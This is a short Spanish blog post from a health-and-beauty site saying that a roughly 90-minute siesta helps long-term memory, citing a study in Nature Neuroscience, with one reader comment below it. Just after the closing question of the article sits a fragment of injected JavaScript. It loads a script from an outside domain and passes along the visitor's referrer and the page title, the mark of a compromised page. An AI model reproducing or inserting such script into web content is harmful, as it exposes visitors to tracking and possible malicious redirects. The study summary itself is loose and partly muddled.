Salud y belleza » Salud, salud mental

La siesta es buena para la memoria

1 Comentario

siesta-saludableEn España son muy conocidas las famosas siestas: un sueñecito a media tarde para seguir todo el día con más energía. Pues bien, no es que seamos vagos, sino que en realidad estamos ayudando a nuestra memoria. Según un artículo publicado en Nature Neuroscience una siesta de unos 90 minutos ayuda a conservar la memoria a largo plazo.

La memoria a largo plazo es aquella que contiene las cosas que no desaparecen hasta que no pasa mucho tiempo y que saben “qué” y “cómo”.

Los resultados de este estudio se han obtenido tras hacer una serie de experimentos y actividades con varios grupos, uno que se mantenía despierto y otro que se echaba una siesta. Obviamente, el que se echó la siesta fue el que mejoró sus tareas después, aunque al día siguiente volvían a estar igual.

Por lo que además demuestra que una siesta hace que descansen las neuronas y volvamos a hacerlas funcionar de forma correcta.

Así que tenemos una buena noticia ¡La siesta es buena para la memoria!

¿Te echas la siesta a menudo? ¿Te sientes mejor después?s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : ,

One Comment »

  • Philip said:

    Yo duermo solo siesta los fines de semana. Es relajante, la verdad, y si tengo fiesta por la noche la necesito. Pero si duermo más de una hora me siento muy muy cansado y se me baja la tensión. ¿Sabéis por qué? Gracias y saludos

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.